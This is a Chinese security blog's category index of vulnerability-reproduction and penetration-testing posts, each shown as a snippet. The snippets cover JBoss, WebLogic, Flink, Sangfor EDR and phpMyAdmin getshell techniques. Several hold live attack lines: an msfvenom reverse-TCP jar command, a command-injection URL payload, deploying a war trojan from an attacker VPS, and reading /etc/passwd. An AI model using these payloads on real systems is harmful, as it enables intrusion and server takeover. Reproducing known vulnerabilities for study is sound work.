Web安全
文章平均质量分 88
Web安全
zhzhzh777
稳健
展开
-
【漏洞复现】Mysql UDF提权
前言:UDF (user defined function),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如 user() 或 concat() 等。那么我们该如何使用UDF文件呢?默认的原创 2020-11-27 14:45:23 · 1879 阅读 · 2 评论 -
Kali安装php7.4+mysql的安装
前言:php是世界上最好的语言,可是在kali中如何安装呢?其实在默认的2020版本的kali里面已经集成了php7.3,只需要运行apt-get install php7.3即可对php7.3的安装。那么如何安装php7.4呢?添加源:首先在 etc/apt/下新建一个文件夹 trusted.gpg.dsudo apt -y install lsb-release apt-transport-https ca-certificates sudo wget -O /etc/apt/truste原创 2020-11-16 12:38:30 · 2980 阅读 · 2 评论 -
【漏洞复现】Joomla远程代码执行(RCE)
前言:Joomla是一套内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统,最新版本为3.9.11,可以在Linux、Windows、MacOSX等各种不同的平台上执行,在CMS评测中获得“最佳开源CMS”奖!漏洞位于根目录下的configuration.php ,漏洞相关poc已在互联网公开,采用Joomla并存在漏洞的服务器已处于危险之中。影响版本:Joomla 3.0.0-3.4.6复现过程:第一步:下载源码进行环境搭建https://downloads.joomla.o原创 2020-11-12 14:45:19 · 853 阅读 · 0 评论 -
【实战】Jboss未授权访问(JMX-Console)Getshell
都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。GO:访问地址:http://ip/JMX-Console找到jboss.deployment进入页面后找到void addURL()此时部署我们远程的war木马,部署好了以后点击Invokehttp:vpsIP地址/soft/cus.war随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中找到原创 2020-11-05 23:24:24 · 2500 阅读 · 0 评论 -
[漏洞复现]WebLogic 11g后台上传webshell
前言:Weblogic中间件默认端口为:7001,我这里本地在Winserver2012上搭建了weblogic 11g中间件,至于搭建的教程就不在这里写出来,网上一搜一大把,主要写的就是告诉大家当进入后台以后如何部署我们的webshell。复现:第一步:登录后台界面如下,点击部署。第二步:点击安装第三步:点击上传文件–进入文件上传界面,选择要上传的war包。第四步:制作一个war包,命令如下jar -cvf [war包名称].war 打包目录第五步:上传war包后一直点击下一步原创 2020-11-05 21:06:12 · 826 阅读 · 0 评论 -
【漏洞复现】Nginx 文件名逻辑漏洞(CVE-2013-4547)
前言:这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下:location ~ \.php$ { include fastcgi_params; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_para原创 2020-11-04 11:25:17 · 568 阅读 · 0 评论 -
[漏洞复现]Fastjson1.2.24反序列化环境搭建+漏洞复现
前言:Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。Fastjson 特性:提供服务器端、安卓客户端两种解析工具,性能表现较好。提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,pa原创 2020-11-02 11:17:18 · 1350 阅读 · 0 评论 -
xray被动扫描+burpsuite
前言:通常我们在进行web扫描漏洞时候,都是使用各种扫描器输入网址乱扫一通。这种方式虽然大众化,但存在许许多多的缺点。比如:直接扫描导致访问网站变慢、IP存在被防火墙BAN的可能。那么今天带来的新姿势就是xray被动式扫描,在我们进行手动浏览器网页时,使用burp抓包,并且对浏览过的网页进行漏洞扫描。流程如下:浏览器访问目标网址——》burp抓包——》xray检测burp所抓取的数据包。第一步:打开burp,设置代理。第二步:浏览器设置代理与burp进行联通。此时通过浏览器访问网址后的数原创 2020-10-26 23:34:15 · 1667 阅读 · 1 评论 -
[漏洞复现]Apache Flink未授权访问+远程代码命令执行
前言:近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本)但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。漏洞复现:首先通过msfveon生成jar包,命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar然原创 2020-10-24 22:30:41 · 2593 阅读 · 1 评论 -
不安全的HTTP方法(测试)
前言:我们常见的HTTP请求方法是GET、POST和HEAD。但是,其实除了这两个之外,HTTP还有一些其他的请求方法。WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。We原创 2020-09-08 16:05:29 · 2787 阅读 · 0 评论 -
在密码重置请求包中添加X-Forwarded-Host实现受害者账户完全劫持
今天分享的这篇Writeup为作者通过利用目标网站“忘记密码”功能,在重置密码请求发包中添加X-Forwarded-Host主机信息,欺骗目标网站把重置密码的链接导向到自己的服务器,从而实现对受害者账户的完全劫持这里,基于保密原因,先假设目标测试网站为redacted.com,在对其测试过程中,我把重点放到了它的“忘记密码”功能处。经过了6个小时的折腾,我发现了其中存在一个非常有意思的漏洞,利用该漏洞可以实现对目标受害者的完全账户劫持。发现过程:所需工具:BurpSuite、Ngrok Server.转载 2020-08-25 16:19:30 · 591 阅读 · 0 评论 -
某信服EDR终端检测响应平台RCE漏洞
前言:这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下。复现:第一步:通过fofa搜索语法title="终端检测响应平台"可以找到一大批使用该系统的站点。第二步:随缘点击进去一个来到主界面,也就是这个样子。第三步:构造payload,这里漏洞文件是c.php,漏洞参数是host/tool/log/c.php?strip_slashes=system&host=id直接root权限反弹shell。...原创 2020-08-18 10:06:31 · 4852 阅读 · 2 评论 -
Zookeeper未授权访问利用
前言:ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够执原创 2020-08-05 14:42:50 · 4482 阅读 · 0 评论 -
Apache Solr远程命令执行漏洞复现+实战
前言:Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。漏洞原理:该漏洞的产生是由于两方面的原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。Apache Solr默认集成VelocityResponseWriter插件,在该插件的初原创 2020-07-21 17:07:53 · 1607 阅读 · 0 评论 -
Redis未授权访问漏洞利用总结
没有设置密码认证(一般为空),可以免密码远程登录redis服务。原创 2020-06-24 17:34:09 · 1112 阅读 · 0 评论 -
ActiveMQ漏洞(CVE-2016-3088)利用总结
前言:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveM原创 2020-06-23 15:51:33 · 1447 阅读 · 0 评论 -
【漏洞复现】ApacheShiro1.2.4反序列化漏洞复现(CVE-2016-4437)
前言:Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。影响版本:Apache Shiro <= 1.2.4漏洞原理:Apache Shiro 1.2.4及以前版本中,Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码原创 2020-06-15 00:01:28 · 2030 阅读 · 4 评论 -
【漏洞复现】JBoss反序列化漏洞(CVE-2017-12149)
前言:JBoss 反序列化漏洞,该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。但近期有安全研究者发现JBossAS 6.x也受该漏洞影响,恶意访问者利用该漏洞无需用户验证即可获得服务器的控制权。该漏洞的细节和验证代码已公开,为避免造成损失,建议及时修复升级至JBossAS 7版本影响版本:原创 2020-05-18 16:46:22 · 2279 阅读 · 0 评论 -
kali安装docker说明
使用kali安装docker非常简单。只需要几条命令。首先添加更新源,来到位置/etc/apt/sources.list通过vim进行编辑后添加如下源:deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-freedeb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free然后执行如下命令:curl -fsSL http://m原创 2020-05-18 09:46:37 · 385 阅读 · 0 评论 -
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
前言:最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF中都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...原创 2020-04-23 16:32:07 · 1473 阅读 · 0 评论 -
Web安全访问控制及权限提升漏洞
一、什么是访问控制?简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)”1、从用户角度访问控制模型分为以下类型:垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。水平访问控制:控制用户只能访问自己的资...原创 2020-04-23 11:03:11 · 2422 阅读 · 0 评论 -
文件上传漏洞绕过总结
前言:一:漏洞产生的原因由于文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型,导致攻击者能够向某个可通过web访问的目录上传恶意文件,并被脚本解析器执行,这样就可以在服务器上执行恶意脚本。关于文件上传漏洞绕过的练习,可以通过自己搭建源码upload-labs来学习。二:常见的文件检测方式与绕过方式前端js检测:绕过方式:在前端页面修改js或者删除当前js直接上传,抓包...原创 2020-04-21 14:20:19 · 2084 阅读 · 3 评论 -
[漏洞复现]CVE-2020-1938漏洞复现
前言:漏洞介绍:Tomcat默认开启AJP服务(8009端口),存在一处文件包含缺陷。攻击者可以通过构造的恶意请求包来进行文件包含操作,从而读取有漏洞的Tomcat服务器上Web目录文件。影响版本:Apache Tomcat 6Apache Tomcat 7 < 7.0.100Apache Tomcat 8 < 8.5.51Apache Tomcat 9 < 9.0....原创 2020-03-30 17:47:38 · 2435 阅读 · 0 评论 -
使用Ngrok来进行内网端口转发
前言:在学习了网络安全之后,我们知道了公网和私网(内网),私网是不能直接在公网传输和通信的。比如一个学校,一个公司,都是单独在自己的私网里面,通过这个私网内部的路由器(NAPT方式)和外界通信。那么如果A公司的员工要和B公司的员工通过公司的网络进行通信,由于A公司的员工和B公司的员工都是在单独的私网里面,那么怎么办呢?内网转发:通过字面的意思也不难理解,就是将内部的网络和端口,也就私网的网络...原创 2020-03-30 10:48:27 · 1217 阅读 · 2 评论 -
sqlmap,Tamper详解及使用指南
sqlmap,Tamper详解及使用指南:sqlmap版本当前为1.2.7.20,共有57个tamper脚本,与1.0版本相比新增了19个脚本。0x2char:将每个编码后的字符转换为等价表达apostrophemask:单引号替换为Utf8字符apostrophenullencode:替换双引号为%00%27appendnullbyte:有效代码后添加%00base64encode...转载 2020-03-06 22:13:27 · 1610 阅读 · 0 评论 -
Apache2配置目录分析
前言:这里apache2是Ubuntu下发行的架构网站的版本,apache2和apache有点不同,包括配置文件名的不同等。接下来我将演示Apache2的基本配置与一些细节。方法:由于这里是Ubuntu环境,安装的方式直接就是apt-get install apache2安装好了以后。apache2的默认配置路径是在/etc/apache2下的,并且和apache不同的是根本不存在http...原创 2020-02-27 16:18:46 · 1340 阅读 · 0 评论 -
Netcat的简单使用
前言:Necat简称nc,拥有“瑞士军刀”的美誉,nc小巧强悍,可以读写TCP和UDP网络连接,它是基于SOCKET协议工作,支持windows端和Linux端。它的功能有很多,常用的功能如下:但是实际用来反弹shell的较多。端口扫描聊天文件传输反弹shell常见方法:端口扫描:nc64 -z -v -n ip地址 端口范围聊天:可以利用nc做一个简单版本的聊天工具,...原创 2020-02-27 14:31:26 · 499 阅读 · 0 评论 -
通过ssh开启代理xshell开socket代理
工具:一个ssh账户,可以连接到一台Linux服务器本地安装xshell方法步骤:第一步:使用xshell,ssh连接到Linux服务器第二步:点击查看,选择隧道窗格,随后xshell,最下面就会显示隧道窗口,最底部。第三步:点击到转移规则上,右击添加,类型选择SOCK5,端口设置一个未占用的端口,然后点击确定。第四步:等设置好了以后最下面的状态是打开的,就表示已经设置成功了...原创 2020-02-20 17:03:28 · 1599 阅读 · 0 评论 -
reGeorg+Proxifier内网代理以及远程连接内网服务器(windows下)
利用方式:工具:reGeory 下载地址:https://github.com/sensepost/reGeorgProxifier 下载地址:https://www.proxifier.com第一步:将tunnel.nosocket.php上传到目标Web目录中,访问url检查下是否正常(一般情况下将原本的文件改成个隐蔽的名字防止被发现)访问正常,显示Georg says, ‘All...原创 2020-02-20 00:44:03 · 1960 阅读 · 0 评论 -
CTF之弥天靶场一
以前打过的一个靶场,今天闲来无事就把步骤什么的都给写一遍。话不多说,开整~步骤打开URL得知是一个登录的界面尝试使用弱口令,万能密码登录都失败,换其他思路,先扫目录吧。其中robots.txt下面的内容是:初步判断这里应该有一个flag。还有这里的1.txt,内容是"请认真核查在改正" 先做为一个信息记录来收集着吧,说不定后期能用到其他路径下的文件访问都是提示"您没有权限访问"。通...原创 2020-02-04 23:34:20 · 910 阅读 · 0 评论 -
Centos7下msf的安装与Postgresql数据库的配置
故事的起因是这样的,之前做的渗透测试都是在虚拟机中通过kali中的msf来做测试,但是这样其实是处于内网当中的,很多操作必须要内网转发出去才能使用,所以就买了一台公网的服务器来安装下msf,然后就是一路踩坑啊……网上很多文章在不同的环境里面,其实配置是有点一样,还有很多失效的,这里就记录下我在Centos7中的安装metasploit的方法和过程。msf的安装使用脚本进行安装,命令如下:c...原创 2020-02-01 14:01:50 · 1325 阅读 · 0 评论 -
lcx内网端口转发
复现过程在提权过程中,我们经常碰到这样的情况,查询得知当前服务器存于内网中,所以无法通过mstsc来进行连接,那么这种情况下,我们就需要用到端口转发工具lcx.exe除此之外,还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡,独立 IP 主机叫做本机将lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP为119.90.140.191 一定要是外网ip 然后我们在本机执行:l...原创 2020-01-29 15:23:25 · 513 阅读 · 0 评论 -
Mysql开启外连
mysql默认的端口是3306,需要确定防火墙没有阻止3306端口,否则是无法通过3306端口连接到myql的。这里就拿华为云的服务器来说明下,通过命令:netstat -ano |find “3306” 可以看到TCP是0.0.0.0:3306说明当前的连接只是针对服务器本身的,此时是未开启外连的,也就是说其他处于公网的ip无法通过mysql -h114.116.30.20 -uroot -...原创 2020-01-29 15:10:05 · 808 阅读 · 0 评论 -
phpmyadmin的Getshell思路
复现过程进入到phpmyadmin后台以后,找到变量点击然后搜索general,找到对应的general log 默认是OFF,将其编辑为ON,然后将默认的general_log_file ,也就是系统日志文件位置修改为网站根目录比如:修改general log file的位置为:D:\phpStudy\PHPTutorial\www\1.php这样当点击save的时候,就会在根目录中新建一个...原创 2020-01-29 14:51:34 · 299 阅读 · 0 评论